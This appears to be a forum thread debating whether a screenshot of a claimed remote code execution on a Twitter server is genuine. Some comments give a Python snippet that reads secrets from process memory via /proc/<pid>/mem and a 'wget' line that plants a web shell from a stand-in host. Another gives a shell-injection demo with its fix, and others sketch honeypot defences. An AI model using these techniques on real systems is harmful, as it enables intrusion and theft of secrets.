It also doesn't look like the standard Linux uptime command, which uses "load average", singular. The BSDs, including OS X, say "load averages"... does Twitter run FreeBSD, or is this copied-and-pasted from an OS X client machine?
I guess it's possible that the URL behind the black bar doesn't match the actual URL used for the exploit, as a further layer of obscuring. If the URL is short it might be too easily guessable, no matter the censorship. And editing the URL would make the seal look like the above. Sure, it looks fake, but there's a not-unreasonable explanation for why it might not actually be fake, and why he'd have made that mistake and thought it not relevant enough (or just didn't notice it) to challenge the central authenticity of the claim.
It's absolutely possible it's fake. But it's equally possible that it's not.
The address bar also has focus (blue outline), further suggesting the URL has been edited after a page load. Normally it loses focus as soon as you hit [enter].
Faking it would be much easier and not betray such evidence:
Hit F12 and edit the HTML to say whatever you want.
Everyone is freaking out about the "URL edit", but it's likely actually a long-string exploit, and he just edited the URL down so it would fit on screen for the screenshot.
It's too amateurish a fake, so I'm actually leaning toward it being real.
It's a standard remote code execution exploit. It's as bad as it gets in security vulnerabilities.
He is running shell commands through the Twitter server - the 'uptime' command is just a demo. He could also access private files and possibly gain access to secure data that would let him reach all data stored on Twitter's servers, etc. He could also alter the Twitter code to display anything he wanted to Twitter users.
I'm not sure about the mechanics of this, but at a minimum the webserver probably has access to the HTTPS private key for the subdomain, or at least has it in memory, since the request is shown to be running over HTTPS.
Reading the memory of another process is not allowed on a modern OS for precisely that reason, so this would be another exploit. (http://en.wikipedia.org/wiki/Process_isolation) But the keys are most likely on disk, readable by the server ;).
Also, some setups are not prone to this: Twitter most likely uses a proxy that terminates SSL and then forwards the request to a smaller webserver running the app. That backend will not hold the keys.
Most larger webservers can also run the app workers as a different user than the webserver itself.
> Reading the memory of another process is not allowed on modern OS for precisely that reason, so this would be another exploit.
Both Linux and Windows allow processes to read the memory of other processes running as the same user: via ptrace() and /proc/<pid>/mem on Linux, and via ReadProcessMemory() on Windows.
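For the Linux side, here's a minimal sketch of the /proc/<pid>/mem mechanism. To keep it self-contained it reads the process's *own* memory (always permitted); reading another same-UID pid additionally requires ptrace attach rights (and a permissive Yama ptrace_scope). The offset arithmetic relies on CPython's bytes-object layout and is illustrative only:

```python
import os

# Pretend this bytes object is a secret (e.g. a private key) sitting
# in process memory.
secret = b"hunter2"

# In CPython, a bytes object's payload is the trailing ob_sval[1] array,
# so the data starts at (object address + basicsize - 1).
addr = id(secret) + bytes.__basicsize__ - 1

# Open unbuffered so we read exactly the bytes we ask for and don't
# fault on unmapped pages past the object.
with open(f"/proc/{os.getpid()}/mem", "rb", buffering=0) as mem:
    mem.seek(addr)
    leaked = mem.read(len(secret))

print(leaked)  # b'hunter2'
```

The same seek-and-read works against `/proc/<other_pid>/mem` once you've attached with ptrace, which is why same-user process isolation buys you much less than it sounds like.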
Seems that he was able to execute the "uptime" shell command via that URL, and its output was served as page content. Now imagine what other, more dangerous commands he could run.
Remote code execution, e.g. he could also execute 'wget http://bad.php.script/shell.php' to plant a shell, or 'sudo <command>' for privilege escalation (up to root). So pretty much anything you can do on Twitter's servers.
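To make the bug class concrete: a hypothetical sketch (not Twitter's actual code) of how a request parameter reaching a shell gives exactly this kind of RCE, and the standard fix:

```python
import subprocess

def vulnerable_handler(filename: str) -> str:
    # BUG: user input is interpolated into a shell command line, so a
    # value like "/dev/null; uptime" runs an attacker-chosen command.
    return subprocess.run(f"cat {filename}", shell=True,
                          capture_output=True, text=True).stdout

def safe_handler(filename: str) -> str:
    # Fix: pass an argument vector with no shell, so shell
    # metacharacters in the input are inert.
    return subprocess.run(["cat", filename],
                          capture_output=True, text=True).stdout

print(vulnerable_handler("/dev/null; echo INJECTED"))  # prints INJECTED
print(safe_handler("/dev/null; echo INJECTED"))        # prints nothing
```

Once the attacker controls the command string, 'uptime' vs. 'wget ... ; sudo ...' is purely their choice.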
Another "fun" thing to do is if the hosted data is just sitting there, wget a browser exploit file on top of it.
This is probably not a serious concern for a place as huge as twitter because they're going to CDN static content separately from dynamic content, but would be really exciting for "I got me one server for my whole startup" types. Maybe you could bypass existing systems to serve up malicious code to end users anyway.
I'm not convinced. Anyone could do this "hack" with MS Paint. If it were real, surely the proof would manifest as some kind of change to the Twitter interface.
A stupid 1am question: is it common among ops teams to replace these "common" binaries with a honeypot-like wrapper that notifies the security team immediately, just in case of a complete meltdown on the web-developer side?
Sorry, I don't have an answer to your question, but in theory, how would it detect an intrusion for automatic notification? It seems to me that distinguishing a bad operation from a good one is the same problem as securing the system in the first place. A vulnerability would likely sail past any such notification system.
A naive approach could be to define that the software stack lives under /opt/twitter/ and everything under /usr/bin/ and /bin/ is just a honeypot, so any legitimate developer using those paths would also trigger a notification. But it smells like overkill, the wrong place, and not worth the extra mileage. The only case I can think of where this would be useful is when management or timing problems prevent proper, secure development -- which is not a problem ops should solve. It would still be interesting to hear if someone actually does this.
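For what it's worth, such a decoy would be tiny. A hypothetical sketch (the /opt/twitter path and the idea of exec'ing the "real" binary are assumptions carried over from the comment above):

```python
#!/usr/bin/env python3
# Hypothetical honeypot wrapper installed in place of e.g. /usr/bin/uptime.
# It records who invoked the decoy and raises an alert via syslog.
import json
import os
import sys
import syslog

def alert(argv):
    # Capture enough context to triage the invocation later.
    event = {
        "decoy": sys.argv[0],
        "argv": argv,
        "pid": os.getpid(),
        "ppid": os.getppid(),
        "uid": os.getuid(),
        "cwd": os.getcwd(),
    }
    syslog.syslog(syslog.LOG_ALERT, "decoy-exec " + json.dumps(event))
    return event

if __name__ == "__main__":
    alert(sys.argv[1:])
    # Optionally exec the real binary from the trusted stack so the
    # caller notices nothing (path is an assumption):
    # os.execv("/opt/twitter/bin/uptime", ["uptime"] + sys.argv[1:])
```

Whether to fail loudly or transparently exec the real tool is a policy choice; transparent exec buys the security team time to watch the attacker.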
Well, it would shield against simplistic attempts at exploiting setuid binaries, certainly, but beyond that its effectiveness would probably be limited, especially as it became more widely known.
Another interesting strategy, particularly in the age of widespread use of VMs and containers, might be to extend the basic idea of ASLR beyond address space. Randomize paths and filenames and system call numbers, for example. You'd need to build all your binaries yourself, of course, and run scripts through some sort of mangler (for maximum effectiveness, do this per-VM/container). You'd want to encrypt non-user-visible strings, too.
There'd be a lot of tooling work necessary to make this practical in the real world, of course.
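A toy sketch of the path-randomization piece, under stated assumptions (the `/r/<slug>` layout and the two binaries are invented for illustration; a real mangler would need proper tokenization, not string replacement):

```python
import secrets

# Per-build/per-container random slug: each image gets its own layout.
slug = secrets.token_hex(8)

# Map well-known paths to randomized ones. Order matters for naive
# replacement: longer paths first, so "/bin/sh" doesn't clobber
# substrings of already-rewritten paths.
layout = {
    "/usr/bin/uptime": f"/r/{slug}/bin/uptime",
    "/bin/sh":         f"/r/{slug}/bin/sh",
}

def mangle(script: str) -> str:
    """Rewrite hard-coded paths in a script to this build's layout."""
    for old, new in layout.items():
        script = script.replace(old, new)
    return script

print(mangle("#!/bin/sh\n/usr/bin/uptime"))
```

Exploit payloads that hard-code `/bin/sh` would then miss, at the cost of exactly the tooling and sysadmin pain mentioned above.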
I've never heard of anyone actually using it. It would be a huge pain and wreak havoc on sysadmins. Also, really nasty attacks are capable of bringing exploit code with them.
The terms of their bug bounty program just say "You may not publicly disclose the vulnerability prior to our resolution" ... https://hackerone.com/twitter
Probably not; seems to me like a pretty dumb thing to do if he wanted any bounty. The domain is nearly as dangerous as the URL, since it leads attackers directly to the vulnerable server(s).
<__>: the SSL seal is missing
<__>: it's a javascript edit
<__>: open a https site in firefox and look at the addressbar
<__>: sec
<__>: yeah
<__>: it DOESN'T appear if you used a javascript hack to make it go away
<__>: and changed the page